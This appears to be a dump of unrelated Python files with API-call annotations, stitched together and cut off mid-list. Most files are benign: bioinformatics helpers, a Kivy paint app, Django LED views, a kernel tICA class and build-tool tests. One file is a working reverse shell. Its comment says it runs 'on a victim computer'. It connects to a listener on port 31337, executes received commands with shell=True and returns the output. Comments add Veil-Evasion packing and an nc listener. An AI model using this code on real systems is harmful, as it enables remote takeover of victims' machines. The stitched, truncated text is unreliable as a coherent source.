'rb')\n", (5961, 5978), False, 'import pysam\n'), ((31278, 31330), 'tensorflow.keras.models.load_model', 'tf.keras.models.load_model', (['model_dir'], {'compile': '(False)'}), '(model_dir, compile=False)\n', (31304, 31330), True, 'import tensorflow as tf\n'), ((34891, 34927), 'pysam.AlignmentFile', 'pysam.AlignmentFile', (['input_bam', '"""rb"""'], {}), "(input_bam, 'rb')\n", (34910, 34927), False, 'import pysam\n'), ((36951, 37025), 'logging.info', 'logging.info', (['"""run_all_pileup_processing: Starting parallel processing.\n"""'], {}), "('run_all_pileup_processing: Starting parallel processing.\\n')\n", (36963, 37025), False, 'import logging\n'), ((37077, 37096), 'sys.stderr.isatty', 'sys.stderr.isatty', ([], {}), '()\n', (37094, 37096), False, 'import sys\n'), ((37703, 37777), 'logging.info', 'logging.info', (['"""run_all_pileup_processing: Finished parallel processing.\n"""'], {}), "('run_all_pileup_processing: Finished parallel processing.\\n')\n", (37715, 37777), False, 'import logging\n'), ((38123, 38198), 'logging.info', 'logging.info', (['"""run_all_pileup_processing: Starting sort for bed results.\n"""'], {}), "('run_all_pileup_processing: Starting sort for bed results.\\n')\n", (38135, 38198), False, 'import logging\n'), ((39637, 39709), 'logging.info', 'logging.info', (['"""write_output_bed: Writing unfiltered output bed files.\n"""'], {}), "('write_output_bed: Writing unfiltered output bed files.\\n')\n", (39649, 39709), False, 'import logging\n'), ((43792, 43885), 'logging.debug', 'logging.debug', (['"""get_bigwig_header_info: Getting ref:length info from reference fasta.\n"""'], {}), "(\n 'get_bigwig_header_info: Getting ref:length info from reference fasta.\\n')\n", (43805, 43885), False, 'import logging\n'), ((45335, 45362), 'pyBigWig.open', 'pyBigWig.open', (['outname', '"""w"""'], {}), "(outname, 'w')\n", (45348, 45362), False, 'import pyBigWig\n'), ((4273, 4291), 'os.remove', 'os.remove', (['logname'], {}), '(logname)\n', (4282, 4291), False, 'import os\n'), ((7315, 7339), 'Bio.SeqIO.parse', 'SeqIO.parse', (['fh', '"""fasta"""'], {}), "(fh, 'fasta')\n", (7326, 7339), False, 'from Bio import SeqIO\n'), ((24544, 24604), 'pandas.DataFrame', 'pd.DataFrame', (['modinfoList'], {'columns': "['strand', 'prob', 'hap']"}), "(modinfoList, columns=['strand', 'prob', 'hap'])\n", (24556, 24604), True, 'import pandas as pd\n'), ((26235, 26255), 'numpy.linalg.norm', 'np.linalg.norm', (['hist'], {}), '(hist)\n', (26249, 26255), True, 'import numpy as np\n'), ((26435, 26462), 'numpy.append', 'np.append', (['(hist / norm)', 'adj'], {}), '(hist / norm, adj)\n', (26444, 26462), True, 'import numpy as np\n'), ((29027, 29067), 'numpy.lib.stride_tricks.sliding_window_view', 'sliding_window_view', (['featPad', '(11)'], {'axis': '(0)'}), '(featPad, 11, axis=0)\n', (29046, 29067), False, 'from numpy.lib.stride_tricks import sliding_window_view\n'), ((29094, 29127), 'numpy.swapaxes', 'np.swapaxes', (['featuresWindow', '(1)', '(2)'], {}), '(featuresWindow, 1, 2)\n', (29105, 29127), True, 'import numpy as np\n'), ((29195, 29217), 'numpy.clip', 'np.clip', (['predict', '(0)', '(1)'], {}), '(predict, 0, 1)\n', (29202, 29217), True, 'import numpy as np\n'), ((38294, 38369), 'logging.info', 'logging.info', (['"""run_all_pileup_processing: Finished sort for bed results.\n"""'], {}), "('run_all_pileup_processing: Finished sort for bed results.\\n')\n", (38306, 38369), False, 'import logging\n'), ((40264, 40281), 'os.path.exists', 'os.path.exists', (['f'], {}), '(f)\n', (40278, 40281), False, 'import os\n'), ((42671, 42867), 'pandas.read_csv', 'pd.read_csv', (['bed'], {'sep': '"""\t"""', 'header': 'None', 'names': "['chromosome', 'start', 'stop', 'mod_probability', 'haplotype', 'coverage',\n 'modified_bases', 'unmodified_bases', 'mod_score', 'unmod_score']"}), "(bed, sep='\\t', header=None, names=['chromosome', 'start',\n 'stop', 'mod_probability', 'haplotype', 'coverage', 'modified_bases',\n 'unmodified_bases', 'mod_score', 'unmod_score'])\n", (42682, 42867), True, 'import pandas as pd\n'), ((43953, 43977), 'Bio.SeqIO.parse', 'SeqIO.parse', (['fh', '"""fasta"""'], {}), "(fh, 'fasta')\n", (43964, 43977), False, 'from Bio import SeqIO\n'), ((45071, 45162), 'logging.error', 'logging.error', (['"""No reference contig names match between bed file and reference fasta!"""'], {}), "(\n 'No reference contig names match between bed file and reference fasta!')\n", (45084, 45162), False, 'import logging\n'), ((26174, 26216), 'numpy.histogram', 'np.histogram', (['probs'], {'bins': '(20)', 'range': '[0, 1]'}), '(probs, bins=20, range=[0, 1])\n', (26186, 26216), True, 'import numpy as np\n'), ((28916, 28936), 'numpy.stack', 'np.stack', (['normhistos'], {}), '(normhistos)\n', (28924, 28936), True, 'import numpy as np\n'), ((31004, 31035), 'logging.getLogger', 'logging.getLogger', (['"""tensorflow"""'], {}), "('tensorflow')\n", (31021, 31035), False, 'import logging\n'), ((40295, 40307), 'os.remove', 'os.remove', (['f'], {}), '(f)\n', (40304, 40307), False, 'import os\n'), ((41321, 41337), 'os.remove', 'os.remove', (['inBed'], {}), '(inBed)\n', (41330, 41337), False, 'import os\n'), ((43099, 43279), 'pandas.read_csv', 'pd.read_csv', (['bed'], {'sep': '"""\t"""', 'header': 'None', 'names': "['chromosome', 'start', 'stop', 'mod_probability', 'haplotype', 'coverage',\n 'modified_bases', 'unmodified_bases', 'adj_prob']"}), "(bed, sep='\\t', header=None, names=['chromosome', 'start',\n 'stop', 'mod_probability', 'haplotype', 'coverage', 'modified_bases',\n 'unmodified_bases', 'adj_prob'])\n", (43110, 43279), True, 'import pandas as pd\n'), ((44867, 44880), 'operator.itemgetter', 'itemgetter', (['(0)'], {}), '(0)\n', (44877, 44880), False, 'from operator import itemgetter\n'), ((47175, 47252), 'logging.error', 'logging.error', (['"""Must supply a model to use when running model-based scoring!"""'], {}), "('Must supply a model to use when running model-based scoring!')\n", (47188, 47252), False, 'import logging\n'), ((9548, 9576), 're.finditer', 're.finditer', (['base', 'query_seq'], {}), '(base, query_seq)\n', (9559, 9576), False, 'import re\n'), ((38268, 38284), 'operator.itemgetter', 'itemgetter', (['(0)', '(1)'], {}), '(0, 1)\n', (38278, 38284), False, 'from operator import itemgetter\n'), ((41280, 41294), 'os.stat', 'os.stat', (['inBed'], {}), '(inBed)\n', (41287, 41294), False, 'import os\n'), ((41787, 41804), 'os.remove', 'os.remove', (['covBed'], {}), '(covBed)\n', (41796, 41804), False, 'import os\n'), ((47379, 47408), 'os.path.isdir', 'os.path.isdir', (['args.model_dir'], {}), '(args.model_dir)\n', (47392, 47408), False, 'import os\n'), ((36198, 36209), 'os.getpid', 'os.getpid', ([], {}), '()\n', (36207, 36209), False, 'import os\n'), ((41741, 41756), 'os.stat', 'os.stat', (['covBed'], {}), '(covBed)\n', (41748, 41756), False, 'import os\n'), ((9806, 9820), 'Bio.Seq.Seq', 'Seq', (['query_seq'], {}), '(query_seq)\n', (9809, 9820), False, 'from Bio.Seq import Seq\n'), ((19141, 19151), 'collections.Counter', 'Counter', (['v'], {}), '(v)\n', (19148, 19151), False, 'from collections import Counter\n')]
|
import numpy as np
def get_monthly_rate(rate) -> float:
"""
computes the monthy interest rate based on the yearly interest rate
:param float rate: the yearly interest rate
:return: the monthly interest rate
This computation uses the 12th root on the growth factor
"""
growth_year = rate + 1
growth_month = np.power(growth_year, 1./12)
rate_month = growth_month - 1
return rate_month
|
[
"numpy.power"
] |
[((343, 374), 'numpy.power', 'np.power', (['growth_year', '(1.0 / 12)'], {}), '(growth_year, 1.0 / 12)\n', (351, 374), True, 'import numpy as np\n')]
|
# Open a reverse shell when executed on a victim computer.
import socket
import subprocess
HOST = "127.0.0.1"
PORT = 31337
sockobj = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sockobj.connect((HOST, PORT))
while 1:
data = sockobj.recv(4096) # returns a bytes object
# don't forget to decode the bytes to str
proc = subprocess.Popen(data.decode(), shell=True, stdout=subprocess.PIPE, stdin=subprocess.PIPE,
stderr=subprocess.PIPE)
result = proc.stdout.read() + proc.stderr.read()
sockobj.send(result)
# sockobj.close() # unreachable code
# Veil-Evasion make .py to .exe
# auxilary/pyinstaller-wrapper
# connect to nc (Windows)
# nc -L -p 31337 -v
|
[
"socket.socket"
] |
[((136, 185), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_STREAM'], {}), '(socket.AF_INET, socket.SOCK_STREAM)\n', (149, 185), False, 'import socket\n')]
|
########################################################################
## SPINN DESIGN CODE
# YOUTUBE: (SPINN TV) https://www.youtube.com/spinnTv
# WEBSITE: spinndesign.com
# TUTORIAL: KIVY
########################################################################
########################################################################
## IMPORTS
########################################################################
from random import random
# Import kivy app
from kivy.app import App
# Import kivy widget
from kivy.uix.widget import Widget
# Import kivy button
from kivy.uix.button import Button
# Import graphics
from kivy.graphics import Color, Ellipse, Line
########################################################################
## PAINT WIDGET CLASS
########################################################################
class MyPaintWidget(Widget):
# Touch event listener
def on_touch_down(self, touch):
# Create random color
color = (random(), 1, 1)
# Draw
with self.canvas:
Color(*color, mode='hsv')
# Ellipse size
d = 30.
# draw Ellipse
Ellipse(pos=(touch.x - d / 2, touch.y - d / 2), size=(d, d))
# Create touch points/ draw line
touch.ud['line'] = Line(points=(touch.x, touch.y))
def on_touch_move(self, touch):
# Add touch points to draw a line
touch.ud['line'].points += [touch.x, touch.y]
########################################################################
## MAIN CLASS
########################################################################
class MyPaintApp(App):
# Build app UI
def build(self):
# Parent widget
parent = Widget()
# Painter Widget
self.painter = MyPaintWidget()
# Clear button
clearbtn = Button(text='Clear')
# Bind button event
clearbtn.bind(on_release=self.clear_canvas)
# Add widgets to parent
parent.add_widget(self.painter)
parent.add_widget(clearbtn)
# Return parent
return parent
# A function to clear the canvas
def clear_canvas(self, obj):
self.painter.canvas.clear()
########################################################################
## RUN THE APP
########################################################################
if __name__ == '__main__':
MyPaintApp().run()
########################################################################
## <== END ==>
########################################################################
|
[
"kivy.graphics.Line",
"kivy.graphics.Ellipse",
"kivy.uix.button.Button",
"random.random",
"kivy.graphics.Color",
"kivy.uix.widget.Widget"
] |
[((1776, 1784), 'kivy.uix.widget.Widget', 'Widget', ([], {}), '()\n', (1782, 1784), False, 'from kivy.uix.widget import Widget\n'), ((1895, 1915), 'kivy.uix.button.Button', 'Button', ([], {'text': '"""Clear"""'}), "(text='Clear')\n", (1901, 1915), False, 'from kivy.uix.button import Button\n'), ((1006, 1014), 'random.random', 'random', ([], {}), '()\n', (1012, 1014), False, 'from random import random\n'), ((1078, 1103), 'kivy.graphics.Color', 'Color', (['*color'], {'mode': '"""hsv"""'}), "(*color, mode='hsv')\n", (1083, 1103), False, 'from kivy.graphics import Color, Ellipse, Line\n'), ((1194, 1254), 'kivy.graphics.Ellipse', 'Ellipse', ([], {'pos': '(touch.x - d / 2, touch.y - d / 2)', 'size': '(d, d)'}), '(pos=(touch.x - d / 2, touch.y - d / 2), size=(d, d))\n', (1201, 1254), False, 'from kivy.graphics import Color, Ellipse, Line\n'), ((1333, 1364), 'kivy.graphics.Line', 'Line', ([], {'points': '(touch.x, touch.y)'}), '(points=(touch.x, touch.y))\n', (1337, 1364), False, 'from kivy.graphics import Color, Ellipse, Line\n')]
|
from copy import deepcopy
from dataclasses import dataclass
from parseridge.utils.logger import LoggerMixin
"""
TODO
[ ] Group the parameters
[ ] Add save to / load from YAML
[x] Add overwrite method from kwargs
"""
@dataclass
class Hyperparameters(LoggerMixin):
"""
Container for the various hyper-parameters used in the training process.
They are stored here to keep the code in the trainer clean.
"""
learning_rate: float = 1e-3
batch_size: int = 4
error_probability: float = 0.1
oov_probability: float = 0.25
margin_threshold: float = 2.5
token_dropout: float = 0.01
loss_function: str = "CrossEntropy" # See Criterion.LOSS_FUNCTIONS
def update(self, **kwargs):
new_object = deepcopy(self)
for parameter_name, value in kwargs.items():
if not parameter_name.startswith("_") and hasattr(new_object, parameter_name):
setattr(new_object, parameter_name, value)
else:
self.logger.warning(f"Cannot update value for '{parameter_name}'.")
return new_object
|
[
"copy.deepcopy"
] |
[((744, 758), 'copy.deepcopy', 'deepcopy', (['self'], {}), '(self)\n', (752, 758), False, 'from copy import deepcopy\n')]
|
import pytest
from profanity.templatetags.profanity import censor
@pytest.mark.parametrize("word", ["fuck", "shit", "cunt", "ass"])
def test_censors_profane_words(word):
assert censor(word) == ("*" * len(word))
@pytest.mark.parametrize("word", ["fudge", "poop", "baddie", "butt"])
def test_does_not_censor_other_words(word):
assert censor(word) == word
@pytest.mark.parametrize(
"sentence",
[
"Fuck you!",
"You are a piece of shit",
"Wow, what a cunt.",
"Thanks for being an asshole",
],
)
def test_censors_words_in_sentences(sentence):
assert "*" in censor(sentence)
@pytest.mark.parametrize(
"sentence",
[
"Screw you!",
"You are a bad person",
"Wow, what a doodoo head",
"Thanks for being a meanie",
],
)
def test_does_not_censor_other_words_in_sentences(sentence):
assert sentence == censor(sentence)
|
[
"pytest.mark.parametrize",
"profanity.templatetags.profanity.censor"
] |
[((69, 133), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""word"""', "['fuck', 'shit', 'cunt', 'ass']"], {}), "('word', ['fuck', 'shit', 'cunt', 'ass'])\n", (92, 133), False, 'import pytest\n'), ((220, 288), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""word"""', "['fudge', 'poop', 'baddie', 'butt']"], {}), "('word', ['fudge', 'poop', 'baddie', 'butt'])\n", (243, 288), False, 'import pytest\n'), ((368, 501), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""sentence"""', "['Fuck you!', 'You are a piece of shit', 'Wow, what a cunt.',\n 'Thanks for being an asshole']"], {}), "('sentence', ['Fuck you!', 'You are a piece of shit',\n 'Wow, what a cunt.', 'Thanks for being an asshole'])\n", (391, 501), False, 'import pytest\n'), ((633, 768), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""sentence"""', "['Screw you!', 'You are a bad person', 'Wow, what a doodoo head',\n 'Thanks for being a meanie']"], {}), "('sentence', ['Screw you!', 'You are a bad person',\n 'Wow, what a doodoo head', 'Thanks for being a meanie'])\n", (656, 768), False, 'import pytest\n'), ((183, 195), 'profanity.templatetags.profanity.censor', 'censor', (['word'], {}), '(word)\n', (189, 195), False, 'from profanity.templatetags.profanity import censor\n'), ((344, 356), 'profanity.templatetags.profanity.censor', 'censor', (['word'], {}), '(word)\n', (350, 356), False, 'from profanity.templatetags.profanity import censor\n'), ((613, 629), 'profanity.templatetags.profanity.censor', 'censor', (['sentence'], {}), '(sentence)\n', (619, 629), False, 'from profanity.templatetags.profanity import censor\n'), ((899, 915), 'profanity.templatetags.profanity.censor', 'censor', (['sentence'], {}), '(sentence)\n', (905, 915), False, 'from profanity.templatetags.profanity import censor\n')]
|
from django.shortcuts import get_object_or_404, render
from django.urls import reverse
from django.http import HttpResponse, HttpResponseRedirect
import json
from .models import Color, Board, LED
def index(request):
"""Homepage"""
all_colors = Color.objects.all() # change to selected colors
all_boards = Board.objects.all() # change to selected boards
try:
current_color_label = request.session['current_color']
except:
current_color_label = None
try:
current_board_label = request.session['current_board']
current_board = Board.objects.get(label=current_board_label)
current_arr = current_board.display_arr()
except:
current_board = None
current_arr = None
context = {
'current_arr': current_arr,
'colors': all_colors,
'boards': all_boards,
'current_color': current_color_label,
'current_board': current_board
}
return render(request, 'leds/index.html', context)
def color(request, color_name):
"""Displays information for a given color"""
color = get_object_or_404(Color, label=color_name)
context = {
'color': color
}
return render(request, 'leds/color.html', context)
def board(request, board_label):
"""Displays information for a given board"""
board = get_object_or_404(Board, label=board_label)
arr = board.display_arr()
context = { 'board': board, 'arr': arr }
return render(request, 'leds/board.html', context)
def all_colors(request):
"""Show all the colors"""
all_colors = Color.objects.all()
context = {
'all_colors': all_colors
}
return render(request, 'leds/all_colors.html', context)
def all_boards(request):
"""Show all boards"""
all_boards = Board.objects.all()
context = { 'all_boards': all_boards }
return render(request, 'leds/all_boards.html', context)
def set_led_color(request, board_label, led_idx, color_label):
board = Board.objects.get(label=board_label)
led = board.leds[led_idx]
color = Color.objects.get(label=color_label)
led.color = color
led.save()
return HttpResponseRedirect(reverse('leds:boards', args=(board_label,)))
# session testing
def selected_color(request):
"""Get selected color from session"""
_label = request.session['current_color']
color = None if _label == 'none' else Color.objects.get(label=_label)
return color
def LED_click(request, led_index):
"""An LED in a board is clicked
set LED color"""
# get selected color
# find associated color by label
color = selected_color(request)
# get currently displayed board in session
try:
board_label = request.session['current_board']
board = Board.objects.get(label=board_label)
except:
board = None
if color is not None and board is not None:
# find LED associated to button (by idx)
# and board
led = LED.objects.get(index=led_index, board=board)
# set LED color to color
led.color = color
# save
led.save()
print('set ', led_index, ' to ', color)
# return to original page
return HttpResponseRedirect(reverse('leds:index'))
def color_click(request, color_label):
"""A displayed color is clicked
select color"""
color = Color.objects.get(label=color_label)
obj = json.loads(color.json())[0]
label = obj.get('fields').get('label')
if not 'current_color' in request.session:
request.session['current_color'] = 'none'
elif request.session['current_color'] == label:
request.session['current_color'] = 'none'
else:
request.session['current_color'] = label
# return HttpResponse(request.session['current_color'])
return HttpResponseRedirect(reverse('leds:index'))
def board_click(request, board_label):
"""A displayed board is clicked
select board"""
board = Board.objects.get(label=board_label)
obj = json.loads(board.json())[0]
label = obj.get('fields').get('label')
if not 'current_board' in request.session:
request.session['current_board'] = 'none'
elif request.session['current_board'] == label:
request.session['current_board'] = 'none'
else:
request.session['current_board'] = label
#return HttpResponse(request.session['current_board'])
return HttpResponseRedirect(reverse('leds:index'))
|
[
"django.shortcuts.render",
"django.shortcuts.get_object_or_404",
"django.urls.reverse"
] |
[((967, 1010), 'django.shortcuts.render', 'render', (['request', '"""leds/index.html"""', 'context'], {}), "(request, 'leds/index.html', context)\n", (973, 1010), False, 'from django.shortcuts import get_object_or_404, render\n'), ((1105, 1147), 'django.shortcuts.get_object_or_404', 'get_object_or_404', (['Color'], {'label': 'color_name'}), '(Color, label=color_name)\n', (1122, 1147), False, 'from django.shortcuts import get_object_or_404, render\n'), ((1204, 1247), 'django.shortcuts.render', 'render', (['request', '"""leds/color.html"""', 'context'], {}), "(request, 'leds/color.html', context)\n", (1210, 1247), False, 'from django.shortcuts import get_object_or_404, render\n'), ((1343, 1386), 'django.shortcuts.get_object_or_404', 'get_object_or_404', (['Board'], {'label': 'board_label'}), '(Board, label=board_label)\n', (1360, 1386), False, 'from django.shortcuts import get_object_or_404, render\n'), ((1473, 1516), 'django.shortcuts.render', 'render', (['request', '"""leds/board.html"""', 'context'], {}), "(request, 'leds/board.html', context)\n", (1479, 1516), False, 'from django.shortcuts import get_object_or_404, render\n'), ((1680, 1728), 'django.shortcuts.render', 'render', (['request', '"""leds/all_colors.html"""', 'context'], {}), "(request, 'leds/all_colors.html', context)\n", (1686, 1728), False, 'from django.shortcuts import get_object_or_404, render\n'), ((1872, 1920), 'django.shortcuts.render', 'render', (['request', '"""leds/all_boards.html"""', 'context'], {}), "(request, 'leds/all_boards.html', context)\n", (1878, 1920), False, 'from django.shortcuts import get_object_or_404, render\n'), ((2185, 2228), 'django.urls.reverse', 'reverse', (['"""leds:boards"""'], {'args': '(board_label,)'}), "('leds:boards', args=(board_label,))\n", (2192, 2228), False, 'from django.urls import reverse\n'), ((3248, 3269), 'django.urls.reverse', 'reverse', (['"""leds:index"""'], {}), "('leds:index')\n", (3255, 3269), False, 'from django.urls import reverse\n'), ((3853, 3874), 'django.urls.reverse', 'reverse', (['"""leds:index"""'], {}), "('leds:index')\n", (3860, 3874), False, 'from django.urls import reverse\n'), ((4462, 4483), 'django.urls.reverse', 'reverse', (['"""leds:index"""'], {}), "('leds:index')\n", (4469, 4483), False, 'from django.urls import reverse\n')]
|
import numpy as np, pyemma as py
# from msmbuilder.decomposition.tica import tICA
from sklearn.kernel_approximation import Nystroem
class Kernel_tica(object):
def __init__(self, n_components, lag_time,
gamma, # gamma value for rbf kernel
n_components_nystroem=100, # number of components for Nystroem kernel approximation
landmarks = None,
shrinkage = None,
weights='empirical' # if 'koopman', use Koopman reweighting for tICA (see Wu, Hao, et al. "Variational Koopman models: slow collective variables and molecular kinetics from short off-equilibrium simulations." The Journal of Chemical Physics 146.15 (2017): 154104.)
):
self._n_components = n_components
self._lag_time = lag_time
self._n_components_nystroem = n_components_nystroem
self._landmarks = landmarks
self._gamma = gamma
self._nystroem = Nystroem(gamma=gamma, n_components=n_components_nystroem)
self._weights = weights
# self._tica = tICA(n_components=n_components, lag_time=lag_time, shrinkage=shrinkage)
self._shrinkage = shrinkage
return
def fit(self, sequence_list):
if self._landmarks is None:
self._nystroem.fit(np.concatenate(sequence_list))
else:
print("using landmarks")
self._nystroem.fit(self._landmarks)
sequence_transformed = [self._nystroem.transform(item) for item in sequence_list]
# define tica object at fit() with sequence_list supplied for initialization, as it is required by
# Koopman reweighting
self._tica = py.coordinates.tica(sequence_transformed, lag=self._lag_time,
dim=self._n_components, kinetic_map=True,
weights=self._weights)
return
def transform(self, sequence_list):
return self._tica.transform(
[self._nystroem.transform(item) for item in sequence_list])
def fit_transform(self, sequence_list):
self.fit(sequence_list)
return self.transform(sequence_list)
def score(self, sequence_list):
model = self.__class__(n_components = self._n_components, lag_time=self._lag_time, gamma=self._gamma,
n_components_nystroem=self._n_components_nystroem, landmarks=self._landmarks,
shrinkage=self._shrinkage)
model.fit(sequence_list)
return np.sum(model._tica.eigenvalues)
|
[
"sklearn.kernel_approximation.Nystroem",
"pyemma.coordinates.tica",
"numpy.sum",
"numpy.concatenate"
] |
[((975, 1032), 'sklearn.kernel_approximation.Nystroem', 'Nystroem', ([], {'gamma': 'gamma', 'n_components': 'n_components_nystroem'}), '(gamma=gamma, n_components=n_components_nystroem)\n', (983, 1032), False, 'from sklearn.kernel_approximation import Nystroem\n'), ((1691, 1822), 'pyemma.coordinates.tica', 'py.coordinates.tica', (['sequence_transformed'], {'lag': 'self._lag_time', 'dim': 'self._n_components', 'kinetic_map': '(True)', 'weights': 'self._weights'}), '(sequence_transformed, lag=self._lag_time, dim=self.\n _n_components, kinetic_map=True, weights=self._weights)\n', (1710, 1822), True, 'import numpy as np, pyemma as py\n'), ((2549, 2580), 'numpy.sum', 'np.sum', (['model._tica.eigenvalues'], {}), '(model._tica.eigenvalues)\n', (2555, 2580), True, 'import numpy as np, pyemma as py\n'), ((1313, 1342), 'numpy.concatenate', 'np.concatenate', (['sequence_list'], {}), '(sequence_list)\n', (1327, 1342), True, 'import numpy as np, pyemma as py\n')]
|
import os
import subprocess
from unittest import mock
from . import BuilderTest, MockPackage, through_json
from .. import mock_open_log
from mopack.builders import Builder
from mopack.builders.custom import CustomBuilder
from mopack.iterutils import iterate
from mopack.path import Path
from mopack.shell import ShellArguments
from mopack.usage.pkg_config import PkgConfigUsage
class TestCustomBuilder(BuilderTest):
builder_type = CustomBuilder
def check_build(self, builder, build_commands=None, *, submodules=None,
usage=None):
if usage is None:
pcfiles = ['foo']
pcfiles.extend('foo_{}'.format(i) for i in iterate(submodules))
usage = {'name': 'foo', 'type': 'pkg_config',
'path': [self.pkgconfdir('foo')], 'pcfiles': pcfiles,
'extra_args': []}
if build_commands is None:
builddir = os.path.join(self.pkgdir, 'build', builder.name)
build_commands = [i.fill(srcdir=self.srcdir, builddir=builddir)
for i in builder.build_commands]
with mock_open_log() as mopen, \
mock.patch('mopack.builders.custom.pushd'), \
mock.patch('subprocess.run') as mcall: # noqa
builder.build(self.pkgdir, self.srcdir)
mopen.assert_called_with(os.path.join(
self.pkgdir, 'logs', 'foo.log'
), 'a')
for line in build_commands:
mcall.assert_any_call(line, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
universal_newlines=True, check=True)
self.assertEqual(builder.get_usage(
MockPackage(), submodules, self.pkgdir, self.srcdir
), usage)
def test_basic(self):
builder = self.make_builder('foo', build_commands=[
'configure', 'make'
], usage='pkg_config')
self.assertEqual(builder.name, 'foo')
self.assertEqual(builder.build_commands, [
ShellArguments(['configure']),
ShellArguments(['make']),
])
self.assertEqual(builder.deploy_commands, [])
self.assertEqual(builder.usage, PkgConfigUsage(
'foo', submodules=None, _options=self.make_options(),
_path_bases=self.path_bases
))
self.check_build(builder)
def test_build_list(self):
builder = self.make_builder('foo', build_commands=[
['configure', '--foo'], ['make', '-j2']
], usage='pkg_config')
self.assertEqual(builder.name, 'foo')
self.assertEqual(builder.build_commands, [
ShellArguments(['configure', '--foo']),
ShellArguments(['make', '-j2']),
])
self.assertEqual(builder.deploy_commands, [])
self.assertEqual(builder.usage, PkgConfigUsage(
'foo', submodules=None, _options=self.make_options(),
_path_bases=self.path_bases
))
self.check_build(builder)
def test_path_objects(self):
opts = self.make_options()
builder = self.make_builder('foo', build_commands=[
'configure $srcdir/build',
['make', '-C', '$builddir'],
], usage='pkg_config')
self.assertEqual(builder.name, 'foo')
self.assertEqual(builder.build_commands, [
ShellArguments(['configure', (Path('', 'srcdir'), '/build')]),
ShellArguments(['make', '-C', Path('', 'builddir')]),
])
self.assertEqual(builder.deploy_commands, [])
self.assertEqual(builder.usage, PkgConfigUsage(
'foo', submodules=None, _options=opts, _path_bases=self.path_bases
))
self.check_build(builder, build_commands=[
['configure', self.srcdir + '/build'],
['make', '-C', os.path.join(self.pkgdir, 'build', 'foo')],
])
def test_deploy(self):
builder = self.make_builder('foo', build_commands=['make'],
deploy_commands=['make install'],
usage='pkg_config')
self.assertEqual(builder.name, 'foo')
self.assertEqual(builder.build_commands, [
ShellArguments(['make']),
])
self.assertEqual(builder.deploy_commands, [
ShellArguments(['make', 'install']),
])
self.assertEqual(builder.usage, PkgConfigUsage(
'foo', submodules=None, _options=self.make_options(),
_path_bases=self.path_bases
))
self.check_build(builder)
with mock_open_log() as mopen, \
mock.patch('mopack.builders.custom.pushd'), \
mock.patch('subprocess.run') as mcall: # noqa
builder.deploy(self.pkgdir, self.srcdir)
mopen.assert_called_with(os.path.join(
self.pkgdir, 'logs', 'deploy', 'foo.log'
), 'a')
mcall.assert_called_with(
['make', 'install'], stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, universal_newlines=True,
check=True
)
def test_cd(self):
opts = self.make_options()
builder = self.make_builder('foo', build_commands=[
'configure $srcdir/build',
'cd $builddir',
'make',
], usage='pkg_config')
self.assertEqual(builder.name, 'foo')
self.assertEqual(builder.build_commands, [
ShellArguments(['configure', (Path('', 'srcdir'), '/build')]),
ShellArguments(['cd', Path('', 'builddir')]),
ShellArguments(['make']),
])
self.assertEqual(builder.usage, PkgConfigUsage(
'foo', submodules=None, _options=opts, _path_bases=self.path_bases
))
with mock.patch('os.chdir') as mcd:
builddir = os.path.join(self.pkgdir, 'build', 'foo')
self.check_build(builder, build_commands=[
['configure', self.srcdir + '/build'],
['make'],
])
mcd.assert_called_once_with(builddir)
def test_cd_invalid(self):
builder = self.make_builder('foo', build_commands=[
'cd foo bar',
], usage='pkg_config')
with mock_open_log() as mopen, \
mock.patch('mopack.builders.custom.pushd'), \
self.assertRaises(RuntimeError): # noqa
builder.build(self.pkgdir, self.srcdir)
def test_usage_full(self):
builder = self.make_builder(
'foo', build_commands=['make'],
usage={'type': 'pkg_config', 'path': 'pkgconf'}
)
self.assertEqual(builder.name, 'foo')
self.assertEqual(builder.build_commands, [
ShellArguments(['make']),
])
self.assertEqual(builder.usage, PkgConfigUsage(
'foo', path='pkgconf', submodules=None,
_options=self.make_options(), _path_bases=self.path_bases
))
self.check_build(builder, usage={
'name': 'foo', 'type': 'pkg_config',
'path': [self.pkgconfdir('foo', 'pkgconf')], 'pcfiles': ['foo'],
'extra_args': [],
})
def test_submodules(self):
submodules_required = {'names': '*', 'required': True}
submodules_optional = {'names': '*', 'required': False}
builder = self.make_builder(
'foo', build_commands=['make'], usage='pkg_config',
submodules=submodules_required
)
self.check_build(builder, submodules=['sub'], usage={
'name': 'foo', 'type': 'pkg_config',
'path': [self.pkgconfdir('foo')], 'pcfiles': ['foo_sub'],
'extra_args': [],
})
builder = self.make_builder(
'foo', build_commands=['make'],
usage={'type': 'pkg_config', 'pcfile': 'bar'},
submodules=submodules_required
)
self.check_build(builder, submodules=['sub'], usage={
'name': 'foo', 'type': 'pkg_config',
'path': [self.pkgconfdir('foo')], 'pcfiles': ['bar', 'foo_sub'],
'extra_args': [],
})
builder = self.make_builder(
'foo', build_commands=['make'], usage='pkg_config',
submodules=submodules_optional
)
self.check_build(builder, submodules=['sub'])
builder = self.make_builder(
'foo', build_commands=['make'],
usage={'type': 'pkg_config', 'pcfile': 'bar'},
submodules=submodules_optional
)
self.check_build(builder, submodules=['sub'], usage={
'name': 'foo', 'type': 'pkg_config',
'path': [self.pkgconfdir('foo')], 'pcfiles': ['bar', 'foo_sub'],
'extra_args': [],
})
def test_clean(self):
builder = self.make_builder('foo', build_commands=['make'],
usage='pkg_config')
srcdir = os.path.join(self.pkgdir, 'build', 'foo')
with mock.patch('shutil.rmtree') as mrmtree:
builder.clean(self.pkgdir)
mrmtree.assert_called_once_with(srcdir, ignore_errors=True)
def test_rehydrate(self):
opts = self.make_options()
builder = CustomBuilder('foo', build_commands=['make'],
submodules=None, _options=opts)
builder.set_usage({'type': 'pkg_config', 'path': 'pkgconf'},
submodules=None)
data = through_json(builder.dehydrate())
self.assertEqual(builder, Builder.rehydrate(data, _options=opts))
def test_upgrade(self):
opts = self.make_options()
data = {'type': 'custom', '_version': 0, 'name': 'foo',
'build_commands': [], 'deploy_commands': None,
'usage': {'type': 'system', '_version': 0}}
with mock.patch.object(CustomBuilder, 'upgrade',
side_effect=CustomBuilder.upgrade) as m:
pkg = Builder.rehydrate(data, _options=opts)
self.assertIsInstance(pkg, CustomBuilder)
m.assert_called_once()
|
[
"mopack.builders.Builder.rehydrate",
"unittest.mock.patch.object",
